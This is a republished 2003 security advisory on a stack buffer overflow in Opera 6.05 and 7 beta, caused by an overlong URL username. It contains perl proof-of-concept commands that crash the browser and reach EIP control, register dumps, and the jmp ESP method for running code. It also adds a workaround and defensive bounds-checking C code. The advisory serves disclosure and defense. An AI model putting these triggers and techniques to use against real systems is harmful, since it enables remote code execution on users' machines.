Opera Username Buffer Overflow Vulnerability

2007.10.20
Credit: nesumin
Risk: High
Local: Yes
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hello all. We release the information about the Opera vulnerability here, and we wish that this vulnerability is fixed by the vendor immediately.

___________________________________________________
--------------------------------------------------------------
Synopsis: Opera Username Buffer Overflow Vulnerability
Product: Opera for Windows
Version: 6.05 build 1140 (and Opera 7 beta 2 build 2577)
Vendor: Opera Software ASA (http://www.opera.com/)
Risk: High. Execute arbitrary binary code
Remote: Yes
Local: Yes
Discovered: nesumin <nesumin (at) softhome (dot) net>
Reported: 2003-02-02
Published: 2003-02-09
--------------------------------------------------------------

Product :
Opera for Windows is a GUI-based web browser. It has Mail, News and IM clients.
Opera Software ASA http://www.opera.com/

Overview :
Opera 6.05 build 1140 (and Opera 7 beta 2 build 2577) for Windows has a critical vulnerability. When Opera opens an HTTP URL that contains a long username, a buffer overflow occurs on the stack. An attacker can trigger it using a link (anchor tag), picture (image tag), frame, script, etc. The overflow can overwrite the saved RET address on the stack, which enables execution of arbitrary binary code. If an Opera user opens a malicious URL, they may suffer damage such as system destruction, virus infection, etc.

Tested on :
Opera
  Opera 6.05 build 1140
  Opera 7 beta 2 build 2577
  Opera 7.00 build 2637
  Opera 7.01 build 2651
  English edition and Japanese edition.
Platform
  Windows 98SE JP
  Windows 2000 SP3 JP
  Windows XP SP1 JP

Vulnerable in tested :
  Opera 6.05 build 1140
  Opera 7 beta 2 build 2577

Not vulnerable in tested :
  Opera 7.00 build 2637
  Opera 7.01 build 2651

Vendor status :
Already reported, 2003/02/02. But we do not know the response and attitude of Opera Software ASA toward this vulnerability, because we have not had a formal reply from Opera Software ASA.

Solution :
We propose the following temporary method until this vulnerability is fixed by the vendor.
Delete the two "%s" from the string of resource number "21463" in the language file (*.lng). As a result, the user name and server name are no longer displayed in the URL warning dialog.

Details :
When Opera opens an HTTP URL that contains a user name, it uses the format string of resource number "21463" in a language file to generate the string displayed in the "URL Warning Dialog". Because there is no length check on the user name, specifying a long user name overflows a local buffer on the stack. (The length of the whole URL is restricted.) The RET address can be overwritten with about 2624 characters (stored as 16-bit wide characters); the exact count depends on the string of "21463".

[Opera 6.05 build 1140, English language file]

$ perl -e "exec('opera.exe', 'http://'. 'A' x 2624 .'@/')"

---------------------------------------------------------------------
Exception C0000005
EAX=00410041 EBX=01B5F9BA ECX=0012E254 EDX=01B60E58
ESI=01A8A940 EDI=77DF6001 EBP=0012E278 ESP=0012CDD8
EIP=00423D68 FLAGS=00000216
0012CDD8 00000110 00000001 005F2464 00200020 ........d$_. . .
0012CDE8 00200020 00730055 00720065 0061006E . .U.s.e.r.n.a.
0012CDF8 0065006D 0020003A 00410041 00410041 m.e.:. .A.A.A.A.
0012CE08 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
....
0012E268 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
0012E278 >00410041 00410041 007D0020 007C031E A.A.A.A. .....|.
0012E288 01A8A940 007D02D0 0012E2D8 00000000 @.....}...E.....
---------------------------------------------------------------------

In the above case, an access violation occurs before EIP moves to the RET address. But EIP can be moved by setting fake values, 0x80000001 or others, in the area that is referenced after the overwrite.

$ perl -e "exec('opera.exe', 'http://'.'%01%e8%80%80' x 1311 .'%ef%bb%be' x 2 .'@/')"

"%01%e8%80%80" = 0x80000001, "%ef%bb%be%ef%bb%be" = 0xfefefefe (with the "Encode all addresses with UTF-8" setting.)

---------------------------------------------------------------------
Exception C0000005
EAX=00000001 EBX=005F2464 ECX=00010101 EDX=F03639D8
ESI=00000001 EDI=00000110 EBP=80000001 ESP=0012E28C
*EIP=FEFEFEFE FLAGS=00000202
---------------------------------------------------------------------

The ESP register points to the position of the RET address's offset value + about 0x10 bytes. Therefore, it is possible to execute arbitrary binary code by overwriting the RET address with the address of a "jmp ESP" instruction and putting the binary code after the area pointed to by the ESP register.

In Opera 7.0 build 2637 or later, we could not confirm this vulnerability.

[Note]
The user name written into the buffer by this vulnerability is converted into 16-bit wide characters. When the "Encode all addresses with UTF-8" setting is enabled and the user name is specified in UTF-8 or a similar encoding, the exploit data can easily be placed on the stack. If the setting is disabled, it becomes very difficult.

Sample Code :
(attached file) o6unexp.c
This program is a generator that creates exploit HTML files. Test compiled with Visual C++ 6.
* This source code is only a sample for checking the vulnerability.
* It is the user's responsibility whatever result occurs from this code.

Special thanks :
:: Operash :: [ Unofficial Opera bug and security information site for Japanese people ]
imagine (Operash webmaster)
melorin

Contacts, Etc :
nesumin <nesumin (at) softhome (dot) net>
This information does not guarantee its contents. We may correct the contents of this information as appropriate. We take no responsibility for any damage generated by using this information.
___________________________________________________
--------------------------------------------------
nesumin <nesumin (at) softhome (dot) net>
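The root cause above is a fixed-size stack buffer filled from a localized format string whose "%s" arguments are never length-checked. As an added example (not Opera's code; the format text, buffer size and 255-character limit are assumptions), here is a bounded builder that rejects an oversized username instead of overrunning the stack, plus a userinfo-length check a proxy or log filter could apply to URLs before they reach the browser:

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the localized resource string 21463 and for the
   dialog buffer size; neither value is on the page, both are assumptions. */
#define WARN_FMT "Log in to %s as user %s?"
#define DIALOG_BUF 512
/* Longest username the dialog will display before the URL is rejected. */
#define MAX_USER_LEN 255

/* Bounded replacement for the unchecked sprintf-into-stack-buffer pattern
   the advisory describes. Returns 0 on success, -1 if the username is over
   MAX_USER_LEN or the text would not fit; out[] is always NUL-terminated. */
int build_url_warning(char *out, size_t outsz, const char *host, const char *user)
{
    if (outsz == 0) return -1;
    if (strlen(user) > MAX_USER_LEN) { out[0] = '\0'; return -1; }
    int n = snprintf(out, outsz, WARN_FMT, host, user);
    if (n < 0 || (size_t)n >= outsz) { out[0] = '\0'; return -1; }
    return 0;
}

/* Length of the userinfo ("user" or "user:pass") in front of the '@' of a
   URL's authority, or -1 if there is none. Useful as a pre-parse check in a
   proxy or log filter: the advisory's trigger needs thousands of characters. */
long url_userinfo_len(const char *url)
{
    const char *p = strstr(url, "://");
    if (!p) return -1;
    p += 3;
    const char *end = p + strcspn(p, "/?#");
    const char *at = NULL;
    for (const char *q = p; q < end; q++)
        if (*q == '@') at = q;
    return at ? (long)(at - p) : -1;
}

/* Builds a username of `len` 'A's (the advisory uses 2624) and reports the
   builder's result: -1 means rejected with no overflow, 0 means displayed. */
int try_username_of_length(size_t len)
{
    static char user[4096];
    static char out[DIALOG_BUF];
    if (len >= sizeof user) return -1;
    memset(user, 'A', len);
    user[len] = '\0';
    return build_url_warning(out, sizeof out, "example.test", user);
}
```

Stripping the "%s" arguments from the resource string, as the advisory's workaround does, removes the unchecked input entirely; the bounded builder keeps the display while making the length explicit.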
Copyright 2022, cxsecurity.com